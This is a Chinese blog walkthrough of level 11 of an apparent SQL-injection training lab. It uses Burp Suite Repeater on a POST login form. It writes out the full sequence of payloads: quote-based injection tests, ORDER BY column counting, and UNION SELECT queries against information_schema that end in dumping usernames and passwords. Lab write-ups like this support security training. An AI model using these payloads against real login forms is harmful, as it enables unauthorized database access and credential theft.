less-11的注入操作

本文详细介绍了在火狐浏览器中使用Foxyproxy配置后的BurpSuite进行SQL注入攻击的过程。通过发送Repeater请求,发现基于单引号的字符型注入点,并逐步进行字段判断、表名和列名的查询,最终暴露了数据库中的用户名和密码。
摘要由CSDN通过智能技术生成

在火狐浏览器下载foxyproxy 配置好之后 打开第十一个题目
在这里插入图片描述
在这里插入图片描述
在burpsuite 右击选择 send repeater 根据题目加一个’尝试一下
在这里插入图片描述
uname=admin’ and 1=1 --+&passwd=admin&submit=Submit
在这里插入图片描述uname=admin’ and 1=2 --+&passwd=admin&submit=Submit
and 1=2 --+恒为假是,执行错误,发现注入点是基于单引号的字符型注入
在这里插入图片描述
判断字段
uname=admin’ order by 3 --+&passwd=admin&submit=Submit
发现字段小于3
在这里插入图片描述
uname=admin’ order by 2 --+&passwd=admin&submit=Submit
发现字段数只有2
在这里插入图片描述
uname=admin &passwd= ’ union select 1,2 --+&submit=Submit
由于他只在uname和passwd表单中输出到屏幕上内容,uname闭合了,所以让passwd输出那个查询哪个语句
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat(user(),@@datadir,database()) --+&submit=Submit
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( table_name) from information_schema.tables where table_schema=database() --+&submit=Submit
查询查出哪个库名下的所有的表名(security)
在这里插入图片描述
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( column_name) from information_schema.columns where table_name=“users” --+&submit=Submit爆表里面的字段
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( username,‘/’,password) from users --+&submit=Submit爆字段里面的数据
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值